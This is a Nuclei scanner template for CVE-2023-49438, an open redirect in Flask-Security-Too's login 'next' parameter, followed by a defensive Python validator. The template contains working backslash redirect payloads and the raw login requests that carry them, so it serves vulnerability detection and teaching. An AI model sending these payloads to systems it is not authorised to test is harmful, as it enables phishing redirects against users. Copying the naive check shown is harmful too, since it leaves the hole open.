id: CVE-2023-49438

info:
  name: Python Flask-Security-Too <=5.3.2 - Open Redirect
  author: ritikchaddha
  severity: medium
  description: |
    An open redirect vulnerability exists in the Python package Flask-Security-Too prior to version 5.3.3. Attackers can abuse the 'next' parameter on the /login and /register routes to redirect unsuspecting users to malicious sites via crafted URLs, which could lead to phishing or other attacks ([NVD](https://nvd.nist.gov/vuln/detail/CVE-2023-49438)).
  impact: |
    Allows attackers to redirect users to arbitrary sites, potentially leading to phishing, data theft, or user session hijacking.
  remediation: |
    Upgrade Flask-Security-Too to version 5.3.3 or later to mitigate the open redirect vulnerability.
  reference:
    - https://github.com/Flask-Middleware/flask-security
    - https://github.com/brandon-t-elliott/CVE-2023-49438
    - https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/6HCYH377TPUMUHELPI36PDS2ZM4VFIXM/
    - https://nvd.nist.gov/vuln/detail/CVE-2023-49438
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2023-49438
    cwe-id: CWE-601
    epss-score: 0.01079
    epss-percentile: 0.60852
    cpe: cpe:2.3:a:flask-security-too_project:flask-security-too:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: flask-security-too_project
    product: flask-security-too
  tags: cve2023,cve,redirect,flask,flask-security,redirect

http:
  - raw:
      - |
        GET /login HTTP/1.1
        Host: {{Hostname}}

      - |
        POST /login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        next={{path}}&csrf_token={{csrftoken}}&email={{username}}&password={{password}}&submit=Login

    payloads:
      path:
        - /\interact.sh
        - \/interact.sh

    matchers:
      - type: regex
        part: header_2
        regex:
          - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$'

    extractors:
      - type: regex
        part: body
        name: csrftoken
        group: 1
        regex:
          - 'name="csrf-token" content="(.*)"'
        internal: true
# digest: 4a0a0047304502200e62198376d72e47260ae6f78d5f802867cf519a1b96353bfc3ad4ac9afd5f21022100d1d0772daca94c464420a203dfecb82bc0eed3f1563a2674a4bd3a67ca4d3117:922c64590222798bb761d5b6d8e72950
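A defender-side check for the 'next' parameter the template probes, added here as an illustration and not taken from Flask-Security-Too's code: `naive_is_local` shows why the template's backslash payloads slip past a plain leading-slash test, and `safe_next` is one way to fold backslashes and accept only same-site, path-absolute targets. All function names and sample values are constructed for this example.

```python
from urllib.parse import urlsplit

# Constructed sample values for the 'next' parameter. The first two are the
# payloads the template above sends; the rest are other common open-redirect
# shapes. None of them should be accepted as a same-site target.
OFFSITE_NEXT_VALUES = [
    "/\\interact.sh",           # backslash: browsers resolve this to //interact.sh
    "\\/interact.sh",
    "//interact.sh",
    "///interact.sh",
    "https://interact.sh/login",
]
# Constructed values that a post-login redirect should accept.
LOCAL_NEXT_VALUES = ["/", "/dashboard", "/account?tab=keys#top"]


def naive_is_local(next_url: str) -> bool:
    """Illustrative weak check (not Flask-Security's code): requires a leading
    '/' and rejects a leading '//'. It still passes '/\\interact.sh' because it
    never treats a backslash as a path separator, which browsers do."""
    return next_url.startswith("/") and not next_url.startswith("//")


def safe_next(next_url, fallback: str = "/") -> str:
    """Return next_url only if it is a same-site, path-absolute URL; otherwise
    return the fallback. Backslashes are folded to slashes before inspection,
    mirroring how browsers parse URLs for http(s)."""
    normalised = (next_url or "").replace("\\", "/")
    # Exactly one leading slash: rejects '//host', '///host' and 'scheme:...'.
    if not normalised.startswith("/") or normalised.startswith("//"):
        return fallback
    parts = urlsplit(normalised)
    # Belt and braces: a path-absolute URL must parse with no scheme or host.
    if parts.scheme or parts.netloc:
        return fallback
    return normalised


if __name__ == "__main__":
    for value in OFFSITE_NEXT_VALUES + LOCAL_NEXT_VALUES:
        print(f"{value!r:28} naive={naive_is_local(value)!s:5} "
              f"safe_next={safe_next(value)!r}")
```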